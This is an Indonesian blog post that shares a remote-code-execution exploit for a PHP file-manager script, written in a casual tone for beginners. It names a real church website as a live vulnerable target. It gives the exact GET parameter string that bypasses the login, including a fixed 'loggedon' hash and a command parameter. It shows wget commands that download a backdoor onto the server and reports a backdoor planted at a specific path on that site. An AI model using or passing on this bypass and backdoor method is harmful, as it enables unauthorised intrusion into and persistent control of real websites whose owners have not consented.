close
BLANTERWISDOM101

PHP Filemanager RCE

Saturday, December 15, 2018


Selamat Siang gays kali ini admin mau share Exploit Berjudul  " PHP Filemanager Remote Code Execution "  btw , gimana nilai raportnya bagus-bagus gk ? jangan sampai orang tua kalian pesta oke :'v , langsung saja ke tkp.

Exploit Title : PHP Filemanager RCE
Tested On : Linux
Live bug : http://malayattoorchurch.com/galery/phpfm.php

Buka live bug di atas menggunakan Chrome , Mozilla Firefox , ataupun browser yang suka kalian gunakan.




Oke bisa kalian lihat PHP Filemanager di atas , loh kenapa harus masukin password ? tenang saja kita lakukan bypass terlebih dahulu.

Parameter GET : ?blockKeys[0]=&fm_self=FOOO&loggedon=d41d8cd98f00b204e9800998ecf8427e&action=6&cmd=

Masukan parameter di atas setelah phpfm.php berikut penampakannya :



Bingo lanjut kita coba wget backdoor , berikut
command wget bagi yang belum tau :

command : wget https://site.com/file.php
                     wget https://site.com/file.php -O gans.php



Sekarang kita cek apakah berhasil di wget atau tidak  :





Berhasil , backdoor tertanam pada directory /galery/su.php.accdb inget ya tiap web mungkin berbeda pathnya .

sumber : http://ur-solution.blogspot.com/2018/12/php-file-manager-remote-code-execution.html?m=1




Share This :

0 Comments

Subscribe New Articles

Subscribe to Our Newsletter for Get Quality Updates on Your Email. It's Free!